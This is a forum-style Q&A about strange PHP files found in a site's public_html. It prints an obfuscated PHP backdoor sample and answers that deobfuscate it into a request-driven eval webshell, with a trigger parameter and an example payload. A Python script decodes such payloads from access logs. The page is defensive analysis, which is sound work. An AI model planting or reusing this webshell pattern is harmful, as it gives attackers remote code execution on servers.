Strange PHP files in web root - Php, Apache, Malware - Fatal编程技术网

Strange PHP files in web root


I found several strange files in the public_html directory of a site I'm working on. I call them strange because:

  • they are named wolakfie.php, txvepdhxy.php, and so on
  • they contain seemingly useless code - not obviously malicious, but definitely suspicious
  • I didn't put them there

Now, I'm not the first developer who has worked on this site, so in theory they could have done something in the past. Here is a sample of the contents of one of the files:

        <?php
        $immanuel='JP';$armory='[L[r=t_ii';$forehead='e';$avowal ='G$I(P'; $hewett ='r';$blockading='c'; $folly= ' '; $balking='c';$caste= '$'; $aspirate ='?ca=R';$hegemony =')t,)aRo]';
        $closing = 'e'; $knell ='epI$';
    
        $delays ='R';$authors ='t';
        $immortal ='r'; $displace='S'; $decomposition = 's'; $bastard = 'S';$aurelia='G'; $bisexual= 'H'; $canteen='R';$cager = 'O'; $lorain= 'r]Ogp$';$branden = 'r'; $durant ='(';$lacquered='?gD)(<ls$';$dreamt = '[tPv';$earls ='N;o")(_('; $flowing = 'o';$lactate =';'; $cabaret = 'ri"g)sEyr';
        $censor = '@';
        $asparagus= 'T""';
        $graying= 'leopua';
        $casper = 'e';$kiah='sraKTO';$become = 'CiiS';$flak= ':';
        $madmax='_n(H';$economizing= 'Egf$v'; $clatter = 'O';
    
        $indolently = '(';$interconnection= 'd';
    
        $indefinite= 'n'; $georgina='veno';
        $deviate ='v'; $appropriating='i'; $cocksure= 'oO,)AmHsa';$efface= '(sisL_]e';$influences='U'; $inched='F';$juxtaposes= 'a'; $jenna='Oc6reetO';
    
        $colly= 'S';$corundum = '=i"PEosLE';
    
        $icebergs ='f';$birchen= 'pP'; $brainwashes= 'QH))__';
        $decoded ='tB$eTgod';$brooding= 'V';$equipoise = ':;_(eely';
    
        $indignation='[';$brooks ='dQCohi_b'; $directing= '"';$inspirer= 'h';$gypping ='aOra)E';
        $courier= '$'; $korey = 'e';$dropping= 'G'; $difficulties = ')';
    
        $creature='K';
        $blindfold = 'sa_T';
    
        $dune ='r'; $badger= 'Hl(u'; $imagen = 'E'; $grasp = 'T';$apace='a';
        $hunter= '$)4]';
    
        $derision =';';$excoriate = 't';$auditor= '?';
    
        $gecko='_(a';$checkbook = 'MSee$>s'; $foursome ='O_""'; $eben= $jenna['1'] .
    
        $dune.$checkbook[3]. $gecko['2'] . $excoriate.
        $checkbook[3] . $foursome['1'] . $icebergs. $badger['3'] .
        $georgina['2']. $jenna['1'] .$excoriate. $brooks['5'].$brooks['3'] . $georgina['2'] ;$delano =$folly ;$blanching= $eben ($delano,$checkbook[3]. $deviate . $gecko['2'].$badger['1'] .
    
        $gecko['1'] .$gecko['2'].$dune.$dune. $gecko['2'] .$equipoise['7'].$foursome['1'] . $birchen['0'] . $brooks['3'] .
        $birchen['0']. $gecko['1'].
    
        $icebergs.$badger['3'] .
    
        $georgina['2'] .
    
        $jenna['1'] .$foursome['1']. $decoded['5'] . $checkbook[3] .
    
        $auditor ,
    
        $excoriate.$foursome['1'].
        $gecko['2'] .$dune.$decoded['5']. $checkbook[6] .
    
        $gecko['1'] .$hunter['1'].
    
        $hunter['1'] . $hunter['1'] .
        $derision ); $blanching ($auditor,$cocksure['2'] , $evered['5'] ,
    
        $fineness,
        $baths['5'] ,$checkbook['4'], $cocksure['4'] ,
        $brooks['7'] ,
        $checkbook['4'].
        $brooks['5'].$corundum['0'] .
    
        $gecko['2'] .$dune. $dune .$gecko['2'] .$equipoise['7'] . $foursome['1'] .$cocksure['5'].$checkbook[3]. $dune. $decoded['5'] .
    
        $checkbook[3].$gecko['1'].
    
        $checkbook['4'] . $foursome['1']. $canteen .$imagen.
        $brooks[1].$influences.
    
        $imagen. $checkbook['1']. $grasp . $cocksure['2'].$checkbook['4'] . $foursome['1'] .$brooks['2'] . $foursome[0] .$foursome[0] .$creature. $knell['2'].$imagen . $cocksure['2'].$checkbook['4'].$foursome['1'] . $checkbook['1'] . $imagen .
    
        $canteen. $brooding.$imagen. $canteen . $hunter['1'] . $derision.
    
        $checkbook['4'].$gecko['2']. $corundum['0']. $brooks['5'].
        $checkbook[6] . $checkbook[6] . $checkbook[3].$excoriate .$gecko['1']. $checkbook['4'] .$brooks['5']. $indignation.
        $foursome['3']. $checkbook[6].$brooks['3'] . $brooks['3'] .$brooks['3'] .$badger['1'].$birchen['0']. $inspirer .$decoded['5'] .$foursome['3']. $hunter['3'].$hunter['1'] . $auditor . $checkbook['4'] . $brooks['5'] .
        $indignation. $foursome['3']. $checkbook[6] .$brooks['3'].$brooks['3'].$brooks['3'] .$badger['1'].$birchen['0'] .
    
        $inspirer . $decoded['5'].$foursome['3'] . $hunter['3'] .
    
        $equipoise['0'] .
        $gecko['1'].$brooks['5'].$checkbook[6] . $checkbook[6].$checkbook[3] . $excoriate. $gecko['1'] . $checkbook['4']. $brooks['5']. $indignation.
        $foursome['3'] . $badger[0].
    
        $grasp.$grasp .
        $birchen['1'] .
        $foursome['1'] . $checkbook['1'] . $foursome[0] .$foursome[0]. $foursome[0]. $corundum['7'] .$birchen['1'].
    
        $badger[0].$dropping .$foursome['3']. $hunter['3']. $hunter['1']. $auditor .$checkbook['4'].
        $brooks['5'].
    
        $indignation.$foursome['3'] .
    
        $badger[0] .$grasp .$grasp .
        $birchen['1'] .$foursome['1'] .$checkbook['1'].$foursome[0] .$foursome[0] .$foursome[0].$corundum['7'] . $birchen['1'] .$badger[0] .
    
        $dropping .$foursome['3'] . $hunter['3']. $equipoise['0']. $brooks['0'].$brooks['5']. $checkbook[3].$hunter['1'] .
    
        $derision .$checkbook[3].
        $deviate.$gecko['2'].$badger['1'] . $gecko['1'] .$checkbook[6]. $excoriate . $dune.$dune.$checkbook[3]. $deviate. $gecko['1'] .
    
        $brooks['7'].
    
        $gecko['2']. $checkbook[6] .$checkbook[3].$jenna['2'] . $hunter['2'].$foursome['1'] .
    
        $brooks['0'] .
        $checkbook[3].$jenna['1'] .$brooks['3'] .$brooks['0'].
    
        $checkbook[3].$gecko['1'] .$checkbook[6]. $excoriate. $dune .$dune.
        $checkbook[3] . $deviate.
    
        $gecko['1'] .$checkbook['4']. $gecko['2'] . $hunter['1'].
    
        $hunter['1'].
    
        $hunter['1'] .
        $hunter['1'] .$derision );
    
    
    They contain seemingly useless code - not obviously malicious, but definitely suspicious

    They are very malicious.

    Relevant bits from the first code:

    $i=array_merge($_REQUEST,$_COOKIE,$_SERVER);
    $a=isset($i["sooolphg"])?$i["sooolphg"]:(isset($i["HTTP_SOOOLPHG"])?
      $i["HTTP_SOOOLPHG"] : die);
    eval(strrev(base64_decode(strrev($a))));
    
    It can pass pretty much any payload via a request parameter or the URL query string. So anyone making a request like filename.php?sooolphg=1&HTTP_SOOLPHG=shellAccessEasilyHere gets access through the payload being eval'ed. The parameter shellAccessEasilyHere is a command string - reversed, then base64'ed, then reversed again. Something like ==QZjh2bgICSlxGbvByVvJHbkJyO would echo "Hello World".

    You can see the code from another script here (for obvious reasons I'm not posting it here): ideone.com/sUCJee
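As an added analysis aid (not code from the question or the answers), the Python below recovers the PHP carried in the `sooolphg` parameter by undoing the strrev/base64_decode/strrev chain without executing anything, and runs that over a constructed access-log excerpt. The log lines and IP addresses are made up; the parameter name and the "Hello World" value come from the answer above.

```python
from __future__ import annotations
import base64
import binascii
import re
from urllib.parse import unquote

PARAM = "sooolphg"   # query/cookie key the dropper reads: $i["sooolphg"]

def decode_payload(value: str) -> str | None:
    """Undo strrev -> base64_decode -> strrev; None if not valid base64."""
    reversed_b64 = unquote(value)[::-1]               # PHP: strrev($a)
    try:
        raw = base64.b64decode(reversed_b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    # PHP strrev works on bytes, so reverse bytes before decoding as text.
    return raw[::-1].decode("utf-8", errors="replace")

def query_params(query: str) -> dict[str, str]:
    # Split by hand: parse_qs maps '+' to a space, but '+' is a base64 char.
    out: dict[str, str] = {}
    for part in query.split("&"):
        if part:
            key, _, val = part.partition("=")
            out[unquote(key)] = val
    return out

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def find_payloads(log_text: str) -> list[tuple[str, str]]:
    """Return (path, decoded PHP) for every access-log line carrying PARAM."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path, _, query = m.group(1).partition("?")
        value = query_params(query).get(PARAM)
        decoded = decode_payload(value) if value is not None else None
        if decoded is not None:
            hits.append((path, decoded))
    return hits

# Constructed sample log: the first request carries the "Hello World" value
# quoted in the answer above ('=' URL-encoded as %3D); the second is benign.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2014:11:02:13 +0000] "GET /wolakfie.php?sooolphg=%3D%3DQZjh2bgICSlxGbvByVvJHbkJyO HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Mar/2014:11:03:40 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""
```

Running `find_payloads` over a real access log (or over captured `Sooolphg:` request headers, which land in `$_SERVER["HTTP_SOOOLPHG"]`) shows what each hit would have executed, which is what you want for scoping the compromise before cleaning up.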


    Once you've removed all the infected files you're safe. Make sure the infection hasn't got into your own files.


    Good thing you pulled the uninfected version (make sure it really is) from git.

    There's a lot of eval in there, just obfuscated. You've been hacked. Here is the code being eval'ed: reading through the code, data is sent to f.ggjacktest.com. You should also check the OS temp directory; it looks like files were created there.

    Your first mistake was using Godaddy hosting. As I said in the comments.

    Thanks, this could have cost me a lot of work; but it doesn't look like too much. You're welcome.

    Yes, that's why regular backups are important.